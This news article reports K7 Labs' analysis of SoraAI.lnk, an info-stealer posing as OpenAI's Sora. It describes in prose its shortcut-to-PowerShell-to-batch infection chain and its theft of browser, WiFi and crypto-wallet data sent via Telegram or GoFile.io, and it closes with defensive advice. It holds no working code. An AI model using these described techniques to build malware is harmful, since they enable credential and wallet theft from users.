Ddos 
A new info-stealer malware named SoraAI.lnk is leveraging the popularity of OpenAI’s video model, Sora, to infect unsuspecting users. First detected in Vietnam on May 21, 2025, this shortcut-based threat has since spread internationally, camouflaging itself as a legitimate AI tool to lure its victims.
“Threat actors lure users via social engineering tactics to click on malicious files of the same name as legitimate AI models and propagate their agenda,” K7 Labs reports.
SoraAI executes a sophisticated infection routine that unfolds in four key stages, starting from a seemingly harmless shortcut file to a deeply embedded Python-based info stealer.
Stage 1: The Shortcut
The attack begins with a .lnk file linked to cmd.exe, initiating a hidden PowerShell script that connects to a malicious GitHub repository and downloads a file named a.bat.
Stage 2: Chained Batch Scripts
The a.bat script loops persistently until it downloads a ZIP payload. It extracts and executes f.bat, which in turn downloads and runs 1.bat—the final dropper.
Stage 3: Python Execution
1.bat silently installs Python packages such as requests, pywin32, cryptography, and executes python.py, the actual malware.
The python.py script is the core of the SoraAI malware. It:
- Establishes persistence by placing f.bat in the startup folder.
- Harvests browser data like cookies and passwords from Chrome, Firefox, and Opera.
- Steals WiFi credentials, game launcher configs, and crypto wallet data.
- Compresses and exfiltrates data via Telegram or GoFile.io, depending on size.
“It collects various system information including process information, network information, wifi information…,” K7 Labs explains.
SoraAI demonstrates advanced tactics including:
- Custom decryption of Chrome’s Application-bound Encryption using chrome_decrypt.dll.
- Opera-specific password theft using extracted AES keys.
- Crypto wallet reconnaissance from both installed apps and browser extensions.
- Multi-path data collection from locations like Desktop, Downloads, and Documents.
Once data is zipped and tagged with country and IP, it’s either directly sent via a Telegram bot or uploaded to GoFile.io with notification links forwarded to the attacker.
“Sends the zip archive directly if file size is less than 49MB… If the size exceeds 49MB, it uploads it to an external file hosting website ‘GoFile.io’,” K7 Labs notes.
K7 Labs concludes with a warning: “In this world of digital ecosystem it is very important for oneself to understand and differentiate between real and fake resources.”
To mitigate risks:
- Only download software from trusted sources.
- Double-check filenames and extensions before execution.
- Use updated antivirus solutions.
- Stay informed about new cyberthreats.
Related Posts:
- StealC V2: ThreatLabz Unveils the Evolution of a Stealthy Info-Stealer and Malware Loader
- Azure AI Unleashes Sora: Microsoft’s Dive into Native Video Generation
- LummaStealer Expands Attack Surface with Fake Booking Sites and CAPTCHA Tricks
- Sora Comes to Bing Mobile: Free AI Video Generation Now Available!
- ChatGPT and Sora Go Offline: OpenAI Scrambles to Restore Service Amid Global Outage
Donate